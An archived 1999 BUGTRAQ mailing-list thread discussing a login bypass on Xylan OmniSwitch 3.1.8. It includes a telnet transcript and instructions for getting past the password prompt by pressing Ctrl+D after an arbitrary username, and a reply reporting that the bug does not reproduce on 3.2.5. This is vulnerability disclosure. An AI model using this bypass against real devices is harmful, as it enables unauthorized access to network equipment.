I tested this on Xylan's 3.2.5 code. I could not reproduce the bug. -----Original Message----- From: pmsacat_private <pmsacat_private> To: BUGTRAQat_private <BUGTRAQat_private> Date: Monday, April 05, 1999 1:34 PM Subject: Re: Xylan OmniSwitch "features" To put things real clear, and as I said in the original post: -quote- This was tested on software version 3.1.8 (the latest I can access). -end quote- Although I said the user could login/ftp without knowing either user or password strings, I _didn't_ said it would be just a matter of entering random characters and pressing carriage return (that would be a really funny one, but hey, it's not much further from the real thing). - copy & paste --------------------------------------------------------- [pmsac@localhost pmsac]$ telnet switch Trying www.xxx.yyy.zzz... Connected to www.xxx.yyy.zzz. Escape character is '^]'. Welcome to the Xylan OmniSwitch! Version 3.1.8 login : ajsdkal password: ********************************************************************** Xylan OmniSwitch - Copyright (c), 1994-1998 XYLAN Inc. All rights reserved. -end copy & paste ------------------------------------------------------ When you get the password prompt, just press ctrl+d (^D), the user string is arbitrary. You won't get privileges to run any command, not even the "exit" one, you have to close the connection "manually".
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:33 PDT